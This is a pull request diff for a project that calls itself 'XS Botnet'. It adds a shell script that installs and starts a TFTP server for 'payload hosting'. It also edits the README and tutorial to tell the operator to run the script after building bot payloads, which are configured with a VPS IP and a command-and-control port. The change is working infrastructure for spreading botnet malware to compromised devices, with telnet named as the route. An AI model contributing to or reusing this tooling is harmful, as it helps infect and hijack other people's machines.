### PR TITLE
OsxProject/add-tftp-server-support

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,7 +2,8 @@
 ## Requirements:
 - Ubuntu 22.04 or later
 - Read tutorial file
-- Todo: Add tftp server support (may help with telnets)
+- Added tftp server support (helps with telnets)
+- Run `sh tftpserver.sh` to start the tftp service after building your payloads
 
 ## XS Botnet
 - made by: daylight911 (discord), FuckIsra3l(telegram)

--- a/tftpserver.sh
+++ b/tftpserver.sh
@@ -1,0 +1,29 @@
+#!/bin/bash
+# Simple script to setup and start a TFTP server for payload hosting
+set -e
+
+# Ensure tftpd-hpa is installed
+if ! command -v in.tftpd >/dev/null 2>&1; then
+    echo "tftpd-hpa not found. Installing..."
+    apt-get update -y && apt-get install tftpd-hpa -y
+fi
+
+# Default tftp directory
+TFTP_DIR="/var/lib/tftpboot"
+
+# Create directory if it does not exist
+mkdir -p "$TFTP_DIR"
+
+# Copy binaries from apache directory if they exist
+APACHE_DIR="/var/www/html"
+if [ -d "$APACHE_DIR" ]; then
+    cp -f "$APACHE_DIR"/* "$TFTP_DIR" 2>/dev/null || true
+fi
+
+# Ensure correct permissions
+chmod -R 755 "$TFTP_DIR"
+
+# Start tftpd-hpa service
+service tftpd-hpa restart
+
+echo "TFTP server is running and serving files from $TFTP_DIR"

--- a/tutorial.md
+++ b/tutorial.md
@@ -4,6 +4,7 @@
 - `apt-get install gcc-core -y` (Required at all)
 - `apt-get install curl -y` (Needed for payload)
 - `apt-get install apache2 -y` (Needed for payload)
+- `apt-get install tftpd-hpa -y` (Needed for tftp payload)
 
 # Steps:
 - git clone https://github.com/NoSpacesFlies/Botnet/
@@ -14,6 +15,7 @@
 # Bot steps
 - Edit main.c in /bot directory to your bot port and vps ip
 - sh legacybotbuilder.sh
+- sh tftpserver.sh  # start tftp server
 
 # Connecting
 - Putty raw using vps ip + cnc port


### PR DESCRIPTION
## Summary
- provide script to run a tftp server for payload hosting
- document new script and tftp dependency in README and tutorial